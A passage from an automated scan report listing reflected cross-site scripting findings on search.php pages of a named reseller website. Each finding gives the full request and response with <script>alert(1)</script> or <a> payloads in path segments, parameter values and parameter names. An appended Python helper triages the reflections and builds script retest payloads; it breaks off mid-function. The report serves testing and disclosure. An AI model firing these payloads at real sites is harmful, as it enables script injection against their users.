Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3afea<script>alert(1)</script>2bddb0a542f/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2240. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4be99<script>alert(1)</script>6451323735a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/314be99<script>alert(1)</script>6451323735a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/314be99<script>alert(1)</script>6451323735a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2241. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9333d<script>alert(1)</script>c19c2b8f676 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes9333d<script>alert(1)</script>c19c2b8f676/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes9333d<script>alert(1)</script>c19c2b8f676/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2242. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32c29<script>alert(1)</script>fa9d1791952 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos32c29<script>alert(1)</script>fa9d1791952/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos32c29<script>alert(1)</script>fa9d1791952/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2243. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 23bdd<script>alert(1)</script>03376e03994 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/search.php23bdd<script>alert(1)</script>03376e03994?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php23bdd<script>alert(1)</script>03376e03994?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2244. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5bf11<a>a96efe382e2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search5bf11<a>a96efe382e2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search5bf11<a>a96efe382e2&opt=2 was not found on this server.</p>
...[SNIP]...

2.2245. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload aae22<a>26404f8c3d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...aae22<a>26404f8c3d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...aae22<a>26404f8c3d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2246. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad62f<script>alert(1)</script>30bc5928170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ad62f<script>alert(1)</script>30bc5928170=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ad62f<script>alert(1)</script>30bc5928170=1 was not found on this server.</p>
...[SNIP]...

2.2247. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb8b8<a>0b265b39d84 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eb8b8<a>0b265b39d84 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eb8b8<a>0b265b39d84 was not found on this server.</p>
...[SNIP]...

2.2248. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e9142<script>alert(1)</script>eca1785987d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile9142<script>alert(1)</script>eca1785987d/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile9142<script>alert(1)</script>eca1785987d/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2249. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e53f5<script>alert(1)</script>45531d9a651 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e53f5<script>alert(1)</script>45531d9a651/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e53f5<script>alert(1)</script>45531d9a651/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2250. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 47468<script>alert(1)</script>3e306a374e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes47468<script>alert(1)</script>3e306a374e5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes47468<script>alert(1)</script>3e306a374e5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2251. http://www.resellerbase.com/detail/31/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7b4<script>alert(1)</script>a0c5623d906 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/search.php8f7b4<script>alert(1)</script>a0c5623d906?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php8f7b4<script>alert(1)</script>a0c5623d906?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2252. http://www.resellerbase.com/detail/31/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 95731<a>2d17b890a5b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search95731<a>2d17b890a5b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search95731<a>2d17b890a5b&opt=2 was not found on this server.</p>
...[SNIP]...

2.2253. http://www.resellerbase.com/detail/31/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a31ec<a>cf963660554 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...a31ec<a>cf963660554&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...a31ec<a>cf963660554&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2254. http://www.resellerbase.com/detail/31/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ac97<script>alert(1)</script>e012a1e425d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2&6ac97<script>alert(1)</script>e012a1e425d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2&6ac97<script>alert(1)</script>e012a1e425d=1 was not found on this server.</p>
...[SNIP]...

2.2255. http://www.resellerbase.com/detail/31/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8d5bb<a>824ea9da18d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=28d5bb<a>824ea9da18d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=28d5bb<a>824ea9da18d was not found on this server.</p>
...[SNIP]...
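
Seven of the findings above (2.2238, 2.2244, 2.2245, 2.2247, 2.2252, 2.2253 and 2.2255) carry Confidence "Firm" because the scanner only saw a bare <a> canary reflected in a query value, while the path-segment and parameter-name findings on the same URLs reflect <script>alert(1)</script> verbatim and are rated "Certain". Whatever stopped the scanner's script payload in a value therefore applies to that position only, and the report's own advice is to examine it manually. The Python below is an added triage helper, not part of the report or of the scanner: it classifies how a payload came back in a captured response (verbatim, entity-encoded, stripped of tags, or absent), flags the Firm cases for a retest with a script-bearing canary in the same position, and runs over three sample bodies, the <p> lines copied from the 2.2254 and 2.2255 responses and one constructed line showing what an encoding 404 page would return.

```python
"""Triage of reflected-XSS evidence from captured responses (added example, not
part of the report or the scanner): classify how a payload came back and flag
the 'Firm' findings, where only a bare <a> tag was seen, for a scripted retest."""

import re
from html import escape

TAG_RE = re.compile(r"<[^>]+>")


def classify_reflection(body: str, payload: str) -> str:
    """'raw' if the payload appears verbatim, 'encoded' if only its entity-encoded
    form appears, 'stripped' if its text survives without the tags, else 'absent'."""
    if payload in body:
        return "raw"
    if escape(payload, quote=True) in body or escape(payload, quote=False) in body:
        return "encoded"
    if TAG_RE.sub("", payload) in body:
        return "stripped"
    return "absent"


def needs_script_retest(payload: str, outcome: str) -> bool:
    """Raw reflection of a tag that carries no script (the <a> canary behind the
    report's 'Firm' confidence) proves HTML injection, not JavaScript execution,
    so the same position should be resent with a script-bearing payload."""
    return outcome == "raw" and "<script" not in payload.lower()


def retest_payload(payload: str) -> str:
    """Swap the bare <a> canary for the scanner's script canary, keeping the
    random prefix and suffix so the reflection stays easy to locate."""
    return payload.replace("<a>", "<script>alert(1)</script>")


# Constructed from the report: (finding, payload sent, <p> line from the response).
# The last entry is constructed to show what an encoding 404 page would return.
SAMPLES = [
    ("2.2254", "6ac97<script>alert(1)</script>e012a1e425d",
     "<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search"
     "&opt=2&6ac97<script>alert(1)</script>e012a1e425d=1 was not found on this server.</p>"),
    ("2.2255", "8d5bb<a>824ea9da18d",
     "<p>The requested URL /detail/31/themes/search.php?keyword=search...&Submit3=Search"
     "&opt=28d5bb<a>824ea9da18d was not found on this server.</p>"),
    ("hardened (constructed)", "8d5bb<a>824ea9da18d",
     "<p>The requested URL /detail/31/themes/search.php?keyword=search...&amp;Submit3=Search"
     "&amp;opt=28d5bb&lt;a&gt;824ea9da18d was not found on this server.</p>"),
]


def triage(samples=SAMPLES) -> dict:
    """Map each finding to its reflection outcome, whether a script retest is due,
    and the payload to resend if so."""
    result = {}
    for finding, payload, body in samples:
        outcome = classify_reflection(body, payload)
        retest = needs_script_retest(payload, outcome)
        result[finding] = {
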